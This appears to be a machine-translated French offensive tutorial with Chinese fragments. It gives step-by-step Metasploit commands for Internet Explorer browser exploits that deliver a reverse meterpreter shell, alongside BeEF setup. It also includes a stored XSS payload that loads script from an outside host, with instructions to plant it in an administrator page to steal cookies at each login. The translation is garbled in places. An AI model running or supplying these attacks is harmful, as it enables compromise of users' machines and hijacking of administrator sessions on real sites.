(ie6 xp)
kali 1.0 est livré avec boeuf et msf
cd / usr / share / beef-xss
./du boeuf
Accéder à l'URL de l'interface utilisateur, le mot de passe du compte est boeuf
Configurer msf
msfconsole
utilisez windows / browser / ms10_002_aurora
définir PAYLOAD windows / meterpreter / reverse_tcp connect back
set SRVHOST ip address L'adresse cible accessible par le client
set SRVPOST 7777
définir URIPATH /
définir l'adresse IP LHOST Adresse reçue localement
set LPORT 4444
exploit
Ensuite, nous générerons une adresse que nous avons définie: ip: 7777, qui est l'url accessible aux utilisateurs.
Une fois la vulnérabilité déclenchée, nous reviendrons à notre adresse: ip: 4444
Le boeuf peut être entendu à ce moment
msf: sessions -i
sessions -i -
coquille
(ie 7 \ 8 \ 9)
utilisez exploit / windows / browser / ie_execcommand_uaf
définir l'IP SRVHOST
set SRVPOST 8888
définir URIPATH /
exploit
留 后门 : </tExtArEa> '"> <sCRiPt sRC = // xsshs.cn/2rQH> </sCrIpT>
Mettez ce code dans la page administrateur.
Après cela, l'administrateur peut obtenir des cookies chaque fois qu'il se connecte.
outil d'analyse xss: wvs \ coconut tree \ safe3 \ Xelenium \ w3af \ vega \ plug-in d'analyse xss + burp